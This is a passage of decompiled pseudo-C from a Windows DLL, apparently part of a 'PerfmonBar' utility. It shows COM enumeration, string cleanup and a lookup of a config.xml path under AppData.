																																E6E4C4D5B(_t927);
																																goto L136;
																															} else {
																																_t1793 =  *(_t927 - 4);
																																_t1588 = _t1588 + 0x23;
																																__eflags = _t927 - _t1793 + 0xfffffffc - 0x1f;
																																if(__eflags > 0) {
																																	E6E4CEF16(_t1559, _t1588, _t1793, _t1823, __eflags);
																																	asm("int3");
																																	asm("int3");
																																	asm("int3");
																																	asm("int3");
																																	asm("int3");
																																	asm("int3");
																																	asm("int3");
																																	asm("int3");
																																	asm("int3");
																																	asm("int3");
																																	asm("int3");
																																	asm("int3");
																																	asm("int3");
																																	asm("int3");
																																	_push(_t1897);
																																	_t1898 = _t1916;
																																	_push(0xffffffff);
																																	_push(0x6e4e96fa);
																																	_push( *[fs:0x0]);
																																	_t1919 = _t1916 - 0xd4;
																																	_t933 =  *0x6e4ff008; // 0x2b098c7c
																																	_t934 = _t933 ^ _t1898;
																																	_v276 = _t934;
																																	_push(_t1559);
																																	_push(_t1837);
																																	_push(_t1823);
																																	_push(_t934);
																																	 *[fs:0x0] =  &_v272;
																																	_v432 = _t1793;
																																	_t936 = _t1588;
																																	_v480 = _t936;
																																	_v296 = 0;
																																	_v264 = 0;
																																	_t1839 =  *_t936;
																																	__eflags = _t1839;
																																	if(_t1839 == 0) {
																																		L319:
																																		E6E4C8660(0x80004003);
																																		goto L320;
																																	} else {
																																		_t1588 =  &_v48;
																																		_v16 = 0;
																																		_v48 = 0;
																																		_t1288 =  *((intOrPtr*)( *_t1839 + 0x44))(_t1839, _t1588);
																																		__eflags = _t1288;
																																		if(_t1288 < 0) {
																																			L315:
																																			__eflags = 0;
																																			goto L316;
																																		} else {
																																			_t1292 = _v48;
																																			__eflags = _t1292;
																																			if(_t1292 == 0) {
																																				L320:
																																				_t938 = E6E4C8660(0x80004003);
																																				goto L321;
																																			} else {
																																				_t1588 =  *_t1292;
																																				_t1793 =  &_v52;
																																				_t1293 =  *((intOrPtr*)(_t1588 + 0x2c))(_t1292,  &_v52);
																																				__eflags = _t1293;
																																				if(_t1293 < 0) {
																																					goto L315;
																																				} else {
																																					_t1294 = 0;
																																					_v44 = 0;
																																					_v16 = 4;
																																					_t1559 = __imp__#6;
																																					_v188 = 0;
																																					__eflags = _v52;
																																					if(_v52 <= 0) {
																																						L273:
																																						_v36 = 0;
																																						_v16 = 0x11;
																																						_t1588 =  *_v232;
																																						__eflags = _t1588;
																																						if(_t1588 == 0) {
																																							goto L322;
																																						} else {
																																							_t1793 =  &_v36;
																																							_v16 = 0x11;
																																							_v36 = 0;
																																							 *((intOrPtr*)( *_t1588 + 0x34))(_t1588,  &_v36);
																																							_t1297 = _v36;
																																							__eflags = _t1297;
																																							if(_t1297 == 0) {
																																								L307:
																																								goto L308;
																																							} else {
																																								while(1) {
																																									_v40 = 0;
																																									_v16 = 0x13;
																																									__eflags = _t1297;
																																									if(_t1297 == 0) {
																																										goto L319;
																																									}
																																									_t1793 =  &_v40;
																																									_t1301 =  *((intOrPtr*)( *_t1297 + 0x1c))(_t1297,  &_v40);
																																									__eflags = _t1301;
																																									if(_t1301 < 0) {
																																										L314:
																																										 *_t1559(_v40);
																																										_t1297 = _v36;
																																										L308:
																																										_v16 = 0x23;
																																										__eflags = _t1297;
																																										if(_t1297 != 0) {
																																											 *((intOrPtr*)( *_t1297 + 8))(_t1297);
																																										}
																																										goto L310;
																																									} else {
																																										_t1303 = MultiByteToWideChar(3, 0, "display", 0xffffffff, 0, 0);
																																										_t1839 = _t1303;
																																										_t366 = _t1839 - 1; // -1
																																										_t1588 = _t366;
																																										__imp__#4(0, _t1588);
																																										_t1823 = _t1303;
																																										__eflags = _t1823;
																																										if(_t1823 == 0) {
																																											goto L324;
																																										} else {
																																											_t1304 = MultiByteToWideChar(3, 0, "display", 0xffffffff, _t1823, _t1839);
																																											__eflags = _t1304 - _t1839;
																																											if(_t1304 != _t1839) {
																																												goto L323;
																																											} else {
																																												__eflags = _t1823;
																																												if(_t1823 == 0) {
																																													goto L324;
																																												} else {
																																													__imp__#314(_v40, _t1823, 0x400, 0);
																																													_t1839 = _t1304;
																																													 *_t1559(_t1823);
																																													__eflags = _t1839 - 1;
																																													if(_t1839 != 1) {
																																														L297:
																																														_v32 = 0;
																																														_v16 = 0x1a;
																																														_t1306 = _v36;
																																														__eflags = _t1306;
																																														if(_t1306 == 0) {
																																															goto L319;
																																														} else {
																																															_t1588 =  *_t1306;
																																															_t1793 =  &_v32;
																																															_v16 = 0x1a;
																																															_v32 = 0;
																																															_t1307 =  *((intOrPtr*)(_t1588 + 0x40))(_t1306,  &_v32);
																																															__eflags = _t1307;
																																															if(_t1307 < 0) {
																																																_v16 = 0x1c;
																																																_t1308 = _v32;
																																																__eflags = _t1308;
																																																if(_t1308 != 0) {
																																																	 *((intOrPtr*)( *_t1308 + 8))(_t1308);
																																																}
																																																goto L314;
																																															} else {
																																																_t1839 = _v36;
																																																_t1310 = _v32;
																																																__eflags = _t1839 - _t1310;
																																																if(_t1839 != _t1310) {
																																																	_v36 = _t1310;
																																																	_v16 = 0x21;
																																																	__eflags = _t1310;
																																																	if(_t1310 != 0) {
																																																		_t1588 =  *_t1310;
																																																		 *((intOrPtr*)(_t1588 + 4))(_t1310);
																																																		_t1310 = _v32;
																																																	}
																																																	_v16 = 0x20;
																																																	__eflags = _t1839;
																																																	if(_t1839 != 0) {
																																																		 *((intOrPtr*)( *_t1839 + 8))(_t1839);
																																																		_t1310 = _v32;
																																																	}
																																																}
																																																_v16 = 0x22;
																																																__eflags = _t1310;
																																																if(_t1310 != 0) {
																																																	_t1588 =  *_t1310;
																																																	 *((intOrPtr*)(_t1588 + 8))(_t1310);
																																																}
																																																 *_t1559(_v40);
																																																_t1297 = _v36;
																																																__eflags = _t1297;
																																																if(_t1297 != 0) {
																																																	continue;
																																																} else {
																																																	goto L307;
																																																}
																																															}
																																														}
																																													} else {
																																														_v140 = 0;
																																														asm("xorps xmm0, xmm0");
																																														_v136 = 7;
																																														_v156 = 0;
																																														_v116 = 0;
																																														_v112 = 7;
																																														_v132 = 0;
																																														_v92 = 0;
																																														_v88 = 7;
																																														_v108 = 0;
																																														_v84 = 0;
																																														_v80 = 0;
																																														asm("movsd [ebp-0x40], xmm0");
																																														_v16 = 0x17;
																																														_t1588 =  &_v36;
																																														L343();
																																														__eflags = 0;
																																														if(0 != 0) {
																																															_t1823 = _v184;
																																															_push( &_v156);
																																															_t1839 = _t1823[0x16];
																																															__eflags = _t1823[0x18] - _t1839;
																																															if(_t1823[0x18] == _t1839) {
																																																_t1588 =  &(_t1823[0x14]);
																																																E6E4BCFB0(_t1588, _t1975, _t1839);
																																															} else {
																																																_v180 = _t1839;
																																																E6E4BD670(_t1839);
																																																_v16 = 0x18;
																																																E6E4BD670(_t1839 + 0x18,  &_v132);
																																																_v16 = 0x19;
																																																_t1588 = _t1839 + 0x30;
																																																E6E4BD670(_t1588,  &_v108);
																																																asm("movsd xmm0, [ebp-0x40]");
																																																 *((intOrPtr*)(_t1839 + 0x48)) = _v84;
																																																 *((intOrPtr*)(_t1839 + 0x4c)) = _v80;
																																																asm("movsd [esi+0x50], xmm0");
																																																_t1823[0x16] = _t1823[0x16] + 0x58;
																																															}
																																														}
																																														_v16 = 0x13;
																																														_t1815 = _v88;
																																														__eflags = _t1815 - 8;
																																														if(_t1815 < 8) {
																																															L289:
																																															_t1816 = _v112;
																																															__eflags = _t1816 - 8;
																																															if(_t1816 < 8) {
																																																L293:
																																																_t1793 = _v136;
																																																__eflags = _t1793 - 8;
																																																if(_t1793 < 8) {
																																																	goto L297;
																																																} else {
																																																	_t1588 = _v156;
																																																	_t1793 = 2 + _t1793 * 2;
																																																	_t1317 = _t1588;
																																																	__eflags = _t1793 - 0x1000;
																																																	if(_t1793 < 0x1000) {
																																																		L296:
																																																		_push(_t1793);
																																																		E6E4C4D5B(_t1588);
																																																		_t1919 = _t1919 + 8;
																																																		goto L297;
																																																	} else {
																																																		_t1588 =  *(_t1588 - 4);
																																																		_t1793 = _t1793 + 0x23;
																																																		__eflags = _t1317 - _t1588 + 0xfffffffc - 0x1f;
																																																		if(__eflags > 0) {
																																																			goto L325;
																																																		} else {
																																																			goto L296;
																																																		}
																																																	}
																																																}
																																															} else {
																																																_t1588 = _v132;
																																																_t1817 = 2 + _t1816 * 2;
																																																_t1321 = _t1588;
																																																__eflags = _t1817 - 0x1000;
																																																if(_t1817 < 0x1000) {
																																																	L292:
																																																	_push(_t1817);
																																																	E6E4C4D5B(_t1588);
																																																	_t1919 = _t1919 + 8;
																																																	goto L293;
																																																} else {
																																																	_t1588 =  *(_t1588 - 4);
																																																	_t1793 = _t1817 + 0x23;
																																																	__eflags = _t1321 - _t1588 + 0xfffffffc - 0x1f;
																																																	if(__eflags > 0) {
																																																		goto L325;
																																																	} else {
																																																		goto L292;
																																																	}
																																																}
																																															}
																																														} else {
																																															_t1588 = _v108;
																																															_t1818 = 2 + _t1815 * 2;
																																															_t1325 = _t1588;
																																															__eflags = _t1818 - 0x1000;
																																															if(_t1818 < 0x1000) {
																																																L288:
																																																_push(_t1818);
																																																E6E4C4D5B(_t1588);
																																																_t1919 = _t1919 + 8;
																																																goto L289;
																																															} else {
																																																_t1588 =  *(_t1588 - 4);
																																																_t1793 = _t1818 + 0x23;
																																																__eflags = _t1325 - _t1588 + 0xfffffffc - 0x1f;
																																																if(__eflags > 0) {
																																																	goto L325;
																																																} else {
																																																	goto L288;
																																																}
																																															}
																																														}
																																													}
																																												}
																																											}
																																										}
																																									}
																																									goto L685;
																																								}
																																								goto L319;
																																							}
																																						}
																																					} else {
																																						while(1) {
																																							_t1839 = _v48;
																																							__eflags = _t1839;
																																							if(_t1839 == 0) {
																																								goto L319;
																																							}
																																							_t1588 =  *_t1839;
																																							_t1823 =  *(_t1588 + 0x28);
																																							_v16 = 5;
																																							__eflags = _t1294;
																																							if(_t1294 != 0) {
																																								_t1588 =  *_t1294;
																																								 *((intOrPtr*)(_t1588 + 8))(_t1294);
																																							}
																																							_v16 = 4;
																																							_v44 = 0;
																																							_t1339 =  *_t1823(_t1839, _v188,  &_v44);
																																							__eflags = _t1339;
																																							if(_t1339 < 0) {
																																								L272:
																																								L310:
																																								_v16 = 0x24;
																																								_t1298 = _v44;
																																								__eflags = _t1298;
																																								if(_t1298 != 0) {
																																									 *((intOrPtr*)( *_t1298 + 8))(_t1298);
																																								}
																																								L316:
																																								_v16 = 0x25;
																																								_t1713 = _v48;
																																								__eflags = _t1713;
																																								if(_t1713 != 0) {
																																									 *((intOrPtr*)( *_t1713 + 8))(_t1713);
																																								}
																																								 *[fs:0x0] = _v24;
																																								__eflags = _v28 ^ _t1898;
																																								return E6E4C4D4A(_v28 ^ _t1898);
																																							} else {
																																								_v40 = 0;
																																								_v16 = 8;
																																								_t1340 = _v44;
																																								__eflags = _t1340;
																																								if(_t1340 == 0) {
																																									goto L319;
																																								} else {
																																									_t1588 =  *_t1340;
																																									_t1793 =  &_v40;
																																									_t1341 =  *((intOrPtr*)(_t1588 + 0x1c))(_t1340,  &_v40);
																																									__eflags = _t1341;
																																									if(_t1341 < 0) {
																																										L271:
																																										 *_t1559(_v40);
																																										goto L272;
																																									} else {
																																										_t1343 = _v44;
																																										__eflags = _t1343;
																																										if(_t1343 == 0) {
																																											goto L319;
																																										} else {
																																											_t1793 =  &_v172;
																																											__eflags =  *((intOrPtr*)( *_t1343 + 0x20))(_t1343,  &_v172);
																																											if(__eflags < 0) {
																																												goto L271;
																																											} else {
																																												_t1588 =  &_v32;
																																												_v32 = 0;
																																												E6E4B8D60(_t1588,  &_v172, __eflags, _v40);
																																												_v16 = 0xd;
																																												__imp__#8( &_v68);
																																												_t938 =  &_v68;
																																												__imp__#10(_t938,  &_v172);
																																												__eflags = _t938;
																																												if(__eflags < 0) {
																																													L321:
																																													E6E4C8660(_t938);
																																													L322:
																																													E6E4C8660(0x80004003);
																																													L323:
																																													 *_t1559(_t1823);
																																													L324:
																																													E6E4B8BA0(0x8007000e);
																																													L325:
																																													E6E4CEF16(_t1559, _t1588, _t1793, _t1823, __eflags);
																																													asm("int3");
																																													asm("int3");
																																													asm("int3");
																																													_push(_t1839);
																																													_t1840 = _t1588;
																																													_t1589 =  *(_t1840 + 0x44);
																																													__eflags = _t1589 - 8;
																																													if(_t1589 < 8) {
																																														L331:
																																														 *(_t1840 + 0x40) = 0;
																																														 *(_t1840 + 0x44) = 7;
																																														 *((short*)(_t1840 + 0x30)) = 0;
																																														_t1590 =  *(_t1840 + 0x2c);
																																														__eflags = _t1590 - 8;
																																														if(_t1590 < 8) {
																																															L336:
																																															 *(_t1840 + 0x28) = 0;
																																															 *(_t1840 + 0x2c) = 7;
																																															 *((short*)(_t1840 + 0x18)) = 0;
																																															_t1591 =  *(_t1840 + 0x14);
																																															__eflags = _t1591 - 8;
																																															if(_t1591 < 8) {
																																																L341:
																																																 *(_t1840 + 0x10) = 0;
																																																__eflags = 0;
																																																 *(_t1840 + 0x14) = 7;
																																																 *_t1840 = 0;
																																																return 0;
																																															} else {
																																																_t947 =  *_t1840;
																																																_t1592 = 2 + _t1591 * 2;
																																																__eflags = _t1592 - 0x1000;
																																																if(_t1592 < 0x1000) {
																																																	L340:
																																																	_push(_t1592);
																																																	E6E4C4D5B(_t947);
																																																	goto L341;
																																																} else {
																																																	_t1794 =  *((intOrPtr*)(_t947 - 4));
																																																	_t1592 =  &(_t1592[8]);
																																																	__eflags = _t947 - _t1794 + 0xfffffffc - 0x1f;
																																																	if(__eflags > 0) {
																																																		goto L342;
																																																	} else {
																																																		_t947 = _t1794;
																																																		goto L340;
																																																	}
																																																}
																																															}
																																														} else {
																																															_t1279 =  *((intOrPtr*)(_t1840 + 0x18));
																																															_t1711 = 2 + _t1590 * 2;
																																															__eflags = _t1711 - 0x1000;
																																															if(_t1711 < 0x1000) {
																																																L335:
																																																_push(_t1711);
																																																E6E4C4D5B(_t1279);
																																																_t1919 = _t1919 + 8;
																																																goto L336;
																																															} else {
																																																_t1794 =  *((intOrPtr*)(_t1279 - 4));
																																																_t1592 = _t1711 + 0x23;
																																																__eflags = _t1279 - _t1794 + 0xfffffffc - 0x1f;
																																																if(__eflags > 0) {
																																																	goto L342;
																																																} else {
																																																	_t1279 = _t1794;
																																																	goto L335;
																																																}
																																															}
																																														}
																																													} else {
																																														_t1283 =  *((intOrPtr*)(_t1840 + 0x30));
																																														_t1712 = 2 + _t1589 * 2;
																																														__eflags = _t1712 - 0x1000;
																																														if(_t1712 < 0x1000) {
																																															L330:
																																															_push(_t1712);
																																															E6E4C4D5B(_t1283);
																																															_t1919 = _t1919 + 8;
																																															goto L331;
																																														} else {
																																															_t1794 =  *((intOrPtr*)(_t1283 - 4));
																																															_t1592 = _t1712 + 0x23;
																																															__eflags = _t1283 - _t1794 + 0xfffffffc - 0x1f;
																																															if(__eflags > 0) {
																																																L342:
																																																E6E4CEF16(_t1559, _t1592, _t1794, _t1823, __eflags);
																																																asm("int3");
																																																asm("int3");
																																																asm("int3");
																																																asm("int3");
																																																asm("int3");
																																																asm("int3");
																																																_push(_t1898);
																																																_t1899 = _t1919;
																																																_push(0xffffffff);
																																																_push(0x6e4e978b);
																																																_push( *[fs:0x0]);
																																																_t1921 = _t1919 - 0x7c;
																																																_t953 =  *0x6e4ff008; // 0x2b098c7c
																																																_t954 = _t953 ^ _t1899;
																																																_v532 = _t954;
																																																_push(_t1559);
																																																_push(_t1840);
																																																_push(_t1823);
																																																_push(_t954);
																																																 *[fs:0x0] =  &_v528;
																																																_v596 = _t1794;
																																																_v544 = 0;
																																																_v520 = 0;
																																																_t1593 =  *_t1592;
																																																__eflags = _t1593;
																																																if(_t1593 == 0) {
																																																	L505:
																																																	E6E4C8660(0x80004003);
																																																	goto L506;
																																																} else {
																																																	_t1794 =  &_v44;
																																																	_v20 = 0;
																																																	_v44 = 0;
																																																	_t1142 =  *((intOrPtr*)( *_t1593 + 0x44))(_t1593, _t1794);
																																																	__eflags = _t1142;
																																																	if(_t1142 < 0) {
																																																		L501:
																																																		__eflags = 0;
																																																		goto L502;
																																																	} else {
																																																		_t1146 = _v44;
																																																		__eflags = _t1146;
																																																		if(_t1146 == 0) {
																																																			L506:
																																																			_t957 = E6E4C8660(0x80004003);
																																																			goto L507;
																																																		} else {
																																																			_t1593 =  *_t1146;
																																																			_t1794 =  &_v52;
																																																			_t1147 =  *((intOrPtr*)(_t1593 + 0x2c))(_t1146, _t1794);
																																																			__eflags = _t1147;
																																																			if(_t1147 < 0) {
																																																				goto L501;
																																																			} else {
																																																				_t1148 = 0;
																																																				_v40 = 0;
																																																				_v20 = 4;
																																																				_v100 = 0;
																																																				__eflags = _v52;
																																																				if(_v52 <= 0) {
																																																					L496:
																																																					goto L497;
																																																				} else {
																																																					_t1559 = __imp__#6;
																																																					while(1) {
																																																						_t1840 = _v44;
																																																						__eflags = _t1840;
																																																						if(_t1840 == 0) {
																																																							goto L505;
																																																						}
																																																						_t1593 =  *_t1840;
																																																						_t1823 =  *(_t1593 + 0x28);
																																																						_v20 = 5;
																																																						__eflags = _t1148;
																																																						if(_t1148 != 0) {
																																																							_t1593 =  *_t1148;
																																																							 *((intOrPtr*)(_t1593 + 8))(_t1148);
																																																						}
																																																						_v20 = 4;
																																																						_v40 = 0;
																																																						_t1151 =  *_t1823(_t1840, _v100,  &_v40);
																																																						__eflags = _t1151;
																																																						if(_t1151 < 0) {
																																																							L500:
																																																							_t1148 = _v40;
																																																							L497:
																																																							_v20 = 0x15;
																																																							__eflags = _t1148;
																																																							if(_t1148 != 0) {
																																																								 *((intOrPtr*)( *_t1148 + 8))(_t1148);
																																																							}
																																																							L502:
																																																							_v20 = 0x16;
																																																							_t1654 = _v44;
																																																							__eflags = _t1654;
																																																							if(_t1654 != 0) {
																																																								 *((intOrPtr*)( *_t1654 + 8))(_t1654);
																																																							}
																																																							 *[fs:0x0] = _v28;
																																																							__eflags = _v32 ^ _t1899;
																																																							return E6E4C4D4A(_v32 ^ _t1899);
																																																						} else {
																																																							_v48 = 0;
																																																							_v20 = 8;
																																																							_t1152 = _v40;
																																																							__eflags = _t1152;
																																																							if(_t1152 == 0) {
																																																								goto L505;
																																																							} else {
																																																								_t1593 =  *_t1152;
																																																								_t1794 =  &_v48;
																																																								_t1153 =  *((intOrPtr*)(_t1593 + 0x1c))(_t1152, _t1794);
																																																								__eflags = _t1153;
																																																								if(_t1153 < 0) {
																																																									L499:
																																																									 *_t1559(_v48);
																																																									goto L500;
																																																								} else {
																																																									_t1155 = _v40;
																																																									__eflags = _t1155;
																																																									if(_t1155 == 0) {
																																																										goto L505;
																																																									} else {
																																																										_t1794 =  &_v88;
																																																										__eflags =  *((intOrPtr*)( *_t1155 + 0x20))(_t1155, _t1794);
																																																										if(__eflags < 0) {
																																																											goto L499;
																																																										} else {
																																																											_t1593 =  &_v36;
																																																											_v36 = 0;
																																																											E6E4B8D60(_t1593, _t1794, __eflags, _v48);
																																																											_v20 = 0xd;
																																																											__imp__#8( &_v72);
																																																											_t957 =  &_v72;
																																																											__imp__#10(_t957,  &_v88);
																																																											__eflags = _t957;
																																																											if(__eflags < 0) {
																																																												L507:
																																																												E6E4C8660(_t957);
																																																												asm("int3");
																																																												asm("int3");
																																																												asm("int3");
																																																												asm("int3");
																																																												asm("int3");
																																																												asm("int3");
																																																												asm("int3");
																																																												asm("int3");
																																																												asm("int3");
																																																												asm("int3");
																																																												asm("int3");
																																																												asm("int3");
																																																												asm("int3");
																																																												asm("int3");
																																																												_push(_t1899);
																																																												_t1900 = _t1921;
																																																												_push(0xffffffff);
																																																												_push(0x6e4e97f8);
																																																												_push( *[fs:0x0]);
																																																												_t1922 = _t1921 - 0x5c;
																																																												_t960 =  *0x6e4ff008; // 0x2b098c7c
																																																												_t961 = _t960 ^ _t1900;
																																																												_v688 = _t961;
																																																												_push(_t1559);
																																																												_push(_t1840);
																																																												_push(_t1823);
																																																												_push(_t961);
																																																												 *[fs:0x0] =  &_v684;
																																																												_v768 = _t1794;
																																																												_v696 = 0;
																																																												_v676 = 0;
																																																												_t1594 =  *_t1593;
																																																												__eflags = _t1594;
																																																												if(_t1594 == 0) {
																																																													L587:
																																																													E6E4C8660(0x80004003);
																																																													goto L588;
																																																												} else {
																																																													_v24 = 0;
																																																													_v44 = 0;
																																																													_t1077 =  *((intOrPtr*)( *_t1594 + 0x44))(_t1594,  &_v44);
																																																													__eflags = _t1077;
																																																													if(_t1077 < 0) {
																																																														L583:
																																																														__eflags = 0;
																																																														goto L584;
																																																													} else {
																																																														_t1081 = _v44;
																																																														__eflags = _t1081;
																																																														if(_t1081 == 0) {
																																																															L588:
																																																															_t964 = E6E4C8660(0x80004003);
																																																															goto L589;
																																																														} else {
																																																															_t1594 =  *_t1081;
																																																															_t1082 =  *((intOrPtr*)(_t1594 + 0x2c))(_t1081,  &_v56);
																																																															__eflags = _t1082;
																																																															if(_t1082 < 0) {
																																																																goto L583;
																																																															} else {
																																																																_t1083 = 0;
																																																																_v40 = 0;
																																																																_v24 = 4;
																																																																_v100 = 0;
																																																																__eflags = _v56;
																																																																if(_v56 <= 0) {
																																																																	L578:
																																																																	goto L579;
																																																																} else {
																																																																	_t1559 = __imp__#6;
																																																																	while(1) {
																																																																		_t1840 = _v44;
																																																																		__eflags = _t1840;
																																																																		if(_t1840 == 0) {
																																																																			goto L587;
																																																																		}
																																																																		_t1594 =  *_t1840;
																																																																		_t1823 =  *(_t1594 + 0x28);
																																																																		_v24 = 5;
																																																																		__eflags = _t1083;
																																																																		if(_t1083 != 0) {
																																																																			_t1594 =  *_t1083;
																																																																			 *((intOrPtr*)(_t1594 + 8))(_t1083);
																																																																		}
																																																																		_v24 = 4;
																																																																		_v40 = 0;
																																																																		_t1086 =  *_t1823(_t1840, _v100,  &_v40);
																																																																		__eflags = _t1086;
																																																																		if(_t1086 < 0) {
																																																																			L582:
																																																																			_t1083 = _v40;
																																																																			L579:
																																																																			_v24 = 0x11;
																																																																			__eflags = _t1083;
																																																																			if(_t1083 != 0) {
																																																																				 *((intOrPtr*)( *_t1083 + 8))(_t1083);
																																																																			}
																																																																			L584:
																																																																			_v24 = 0x12;
																																																																			_t1634 = _v44;
																																																																			__eflags = _t1634;
																																																																			if(_t1634 != 0) {
																																																																				 *((intOrPtr*)( *_t1634 + 8))(_t1634);
																																																																			}
																																																																			 *[fs:0x0] = _v32;
																																																																			__eflags = _v36 ^ _t1900;
																																																																			return E6E4C4D4A(_v36 ^ _t1900);
																																																																		} else {
																																																																			_v52 = 0;
																																																																			_v24 = 8;
																																																																			_t1087 = _v40;
																																																																			__eflags = _t1087;
																																																																			if(_t1087 == 0) {
																																																																				goto L587;
																																																																			} else {
																																																																				_t1594 =  *_t1087;
																																																																				_t1088 =  *((intOrPtr*)(_t1594 + 0x1c))(_t1087,  &_v52);
																																																																				__eflags = _t1088;
																																																																				if(_t1088 < 0) {
																																																																					L581:
																																																																					 *_t1559(_v52);
																																																																					goto L582;
																																																																				} else {
																																																																					_t1090 = _v40;
																																																																					__eflags = _t1090;
																																																																					if(_t1090 == 0) {
																																																																						goto L587;
																																																																					} else {
																																																																						_t1808 =  &_v92;
																																																																						__eflags =  *((intOrPtr*)( *_t1090 + 0x20))(_t1090,  &_v92);
																																																																						if(__eflags < 0) {
																																																																							goto L581;
																																																																						} else {
																																																																							_t1594 =  &_v48;
																																																																							_v48 = 0;
																																																																							E6E4B8D60(_t1594,  &_v92, __eflags, _v52);
																																																																							_v24 = 0xd;
																																																																							__imp__#8( &_v76);
																																																																							_t964 =  &_v76;
																																																																							__imp__#10(_t964,  &_v92);
																																																																							__eflags = _t964;
																																																																							if(__eflags < 0) {
																																																																								L589:
																																																																								E6E4C8660(_t964);
																																																																								asm("int3");
																																																																								asm("int3");
																																																																								asm("int3");
																																																																								asm("int3");
																																																																								asm("int3");
																																																																								asm("int3");
																																																																								asm("int3");
																																																																								asm("int3");
																																																																								asm("int3");
																																																																								asm("int3");
																																																																								asm("int3");
																																																																								asm("int3");
																																																																								asm("int3");
																																																																								asm("int3");
																																																																								asm("int3");
																																																																								_t1560 = _t1922;
																																																																								_t1925 = (_t1922 - 0x00000008 & 0xfffffff8) + 4;
																																																																								_v800 =  *((intOrPtr*)(_t1560 + 4));
																																																																								_t1902 = _t1925;
																																																																								_t967 =  *0x6e4ff008; // 0x2b098c7c
																																																																								_t968 = _t967 ^ _t1902;
																																																																								_v824 = _t968;
																																																																								 *[fs:0x0] =  &_v816;
																																																																								_t1842 = _t1594;
																																																																								_v1352 = _t1842;
																																																																								E6E4C9520(_t1823,  &_v1348, 0, 0x208);
																																																																								_t1927 = _t1925 - 0x258 + 0xc;
																																																																								_t972 =  &_v1348;
																																																																								__imp__SHGetFolderPathW(0, 0x1a, 0, 0, _t972, _t968, _t1823, _t1840, _t1560,  *[fs:0x0], 0x6e4e982b, 0xffffffff, _t1900, _t1559);
																																																																								__eflags = _t972;
																																																																								if(_t972 < 0) {
																																																																									L607:
																																																																									 *[fs:0x0] = _v44;
																																																																									__eflags = _v52 ^ _t1902;
																																																																									return E6E4C4D4A(_v52 ^ _t1902);
																																																																								} else {
																																																																									__eflags = 0;
																																																																									_v592 = 0;
																																																																									_t1599 =  &_v576;
																																																																									_v588 = 7;
																																																																									_v608 = 0;
																																																																									_t1795 = _t1599 + 2;
																																																																									do {
																																																																										_t975 =  *_t1599;
																																																																										_t1599 = _t1599 + 2;
																																																																										__eflags = _t975;
																																																																									} while (_t975 != 0);
																																																																									_push(_t1599 - _t1795 >> 1);
																																																																									E6E4BC650(_t1560,  &_v608, _t1823, _t1842, _t1975,  &_v576);
																																																																									_v36 = 0;
																																																																									_t1796 = _v588;
																																																																									_t1603 = _v592;
																																																																									__eflags = _t1796 - _t1603 - 0x16;
																																																																									if(_t1796 - _t1603 < 0x16) {
																																																																										_push(0x16);
																																																																										_v580 = 0;
																																																																										_t980 = E6E4BDB20(_t1560,  &_v608, _t1823, _t1842, 0x16, _v580, L"\\PerfmonBar\\config.xml");
																																																																									} else {
																																																																										__eflags = _t1796 - 8;
																																																																										_t1852 =  >=  ? _v608 :  &_v608;
																																																																										_t1823 = _t1603 + 0x16;
																																																																										_v592 = _t1823;
																																																																										E6E4C9C60(_t1852 + _t1603 * 2, L"\\PerfmonBar\\config.xml", 0x2c);
																																																																										_t1927 = _t1927 + 0xc;
																																																																										 *((short*)(_t1852 + _t1823 * 2)) = 0;
																																																																										_t980 =  &_v608;
																																																																										_t1842 = _v580;
																																																																									}
																																																																									asm("movups xmm0, [eax]");
																																																																									asm("movups [ebp-0x268], xmm0");
																																																																									asm("movups [ebp-0x258], xmm0");
																																																																									asm("movq xmm0, [eax+0x10]");
																																																																									 *(_t980 + 0x10) = 0;
																																																																									 *(_t980 + 0x14) = 7;
																																																																									 *_t980 = 0;
																																																																									asm("movq [ebp-0x228], xmm0");
																																																																									asm("movq [ebp-0x248], xmm0");
																																																																									__eflags = _t1842 -  &_v632;
																																																																									if(_t1842 ==  &_v632) {
																																																																										_t1797 = _v612;
																																																																										__eflags = _t1797 - 8;
																																																																										if(_t1797 < 8) {
																																																																											goto L602;
																																																																										} else {
																																																																											_t1632 = _v632;
																																																																											_t1803 = 2 + _t1797 * 2;
																																																																											_t1068 = _t1632;
																																																																											__eflags = _t1803 - 0x1000;
																																																																											if(_t1803 < 0x1000) {
																																																																												L601:
																																																																												_push(_t1803);
																																																																												E6E4C4D5B(_t1632);
																																																																												_t1927 = _t1927 + 8;
																																																																												goto L602;
																																																																											} else {
																																																																												_t1606 =  *((intOrPtr*)(_t1632 - 4));
																																																																												_t1799 = _t1803 + 0x23;
																																																																												__eflags = _t1068 - _t1606 + 0xfffffffc - 0x1f;
																																																																												if(__eflags > 0) {
																																																																													E6E4CEF16(_t1560, _t1606, _t1799, _t1823, __eflags);
																																																																													goto L609;
																																																																												} else {
																																																																													goto L601;
																																																																												}
																																																																											}
																																																																										}
																																																																									} else {
																																																																										L131();
																																																																										asm("movups xmm0, [ebp-0x268]");
																																																																										asm("movups [esi], xmm0");
																																																																										asm("movq xmm0, [ebp-0x228]");
																																																																										asm("movq [esi+0x10], xmm0");
																																																																										L602:
																																																																										_t1798 = _v588;
																																																																										__eflags = _t1798 - 8;
																																																																										if(_t1798 < 8) {
																																																																											L606:
																																																																											__eflags = 0;
																																																																											goto L607;
																																																																										} else {
																																																																											_t1606 = _v608;
																																																																											_t1799 = 2 + _t1798 * 2;
																																																																											_t983 = _t1606;
																																																																											__eflags = _t1799 - 0x1000;
																																																																											if(_t1799 < 0x1000) {
																																																																												L605:
																																																																												_push(_t1799);
																																																																												E6E4C4D5B(_t1606);
																																																																												goto L606;
																																																																											} else {
																																																																												_t1606 =  *((intOrPtr*)(_t1606 - 4));
																																																																												_t1799 = _t1799 + 0x23;
																																																																												__eflags = _t983 - _t1606 + 0xfffffffc - 0x1f;
																																																																												if(__eflags > 0) {
																																																																													L609:
																																																																													E6E4CEF16(_t1560, _t1606, _t1799, _t1823, __eflags);
																																																																													asm("int3");
																																																																													asm("int3");
																																																																													asm("int3");
																																																																													asm("int3");
																																																																													asm("int3");
																																																																													asm("int3");
																																																																													asm("int3");
																																																																													asm("int3");
																																																																													asm("int3");
																																																																													asm("int3");
																																																																													_push(_t1560);
																																																																													_t1562 = _t1927;
																																																																													_t1933 = (_t1927 - 0x00000008 & 0xfffffff8) + 4;
																																																																													_push(_t1902);
																																																																													_v1468 =  *((intOrPtr*)(_t1562 + 4));
																																																																													_t1905 = _t1933;
																																																																													_push(0xffffffff);
																																																																													_push(0x6e4e98a0);
																																																																													_push( *[fs:0x0]);
																																																																													_push(_t1562);
																																																																													_t1934 = _t1933 - 0x50;
																																																																													_t989 =  *0x6e4ff008; // 0x2b098c7c
